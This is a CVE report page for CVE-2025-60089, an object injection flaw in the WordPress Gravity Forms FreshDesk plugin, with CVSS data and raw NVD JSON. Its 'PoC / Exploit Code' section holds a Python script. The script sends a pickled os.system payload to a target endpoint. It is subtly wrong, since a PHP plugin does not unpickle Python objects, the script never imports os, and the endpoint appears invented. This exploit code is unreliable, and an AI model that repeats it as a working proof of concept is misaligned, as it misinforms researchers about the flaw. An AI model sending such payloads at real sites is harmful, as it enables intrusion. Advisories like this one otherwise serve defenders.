Security Vulnerability Report
中文
CVE-2025-60089 CVSS 9.8 CRITICAL

CVE-2025-60089

Published: 2025-12-18 08:16:09
Last Modified: 2026-01-20 15:17:27

Description

Deserialization of Untrusted Data vulnerability in CRM Perks WP Gravity Forms FreshDesk Plugin gf-freshdesk allows Object Injection.This issue affects WP Gravity Forms FreshDesk Plugin: from n/a through <= 1.3.5.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:crmperks:wp_gravity_forms_freshdesk_plugin:*:*:*:*:*:wordpress:*:* - VULNERABLE
gf-freshdesk插件 <= 1.3.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
描述:攻击者通过构造包含恶意序列化对象的POST请求,发送到插件的受影响端点。 注意:以下为漏洞原理示意代码,用于安全研究目的 import requests import pickle import base64 class Exploit: def __reduce__(self): # 演示漏洞原理,实际利用需要目标环境的具体POP链 cmd = 'whoami' return (os.system, (cmd,)) # 构造恶意序列化数据 malicious_data = base64.b64encode(pickle.dumps(Exploit())).decode() # 发送到目标站点 target_url = 'http://target.com/wp-json/gf-freshdesk/endpoint' requests.post(target_url, data={'data': malicious_data}) # 防御建议:升级到最新版本,禁用不安全的反序列化函数

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60089", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:09.090", "lastModified": "2026-01-20T15:17:27.313", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in CRM Perks WP Gravity Forms FreshDesk Plugin gf-freshdesk allows Object Injection.This issue affects WP Gravity Forms FreshDesk Plugin: from n/a through <= 1.3.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:crmperks:wp_gravity_forms_freshdesk_plugin:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "1.3.6", "matchCriteriaId": "B023D6E7-E0B3-4E58-9DEE-206563772F99"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/gf-freshdesk/vulnerability/wordpress-wp-gravity-forms-freshdesk-plugin-plugin-1-3-5-deserialization-of-untrusted-data-vulnerability?_s_id=cve", "source": "[email protected]"}]}}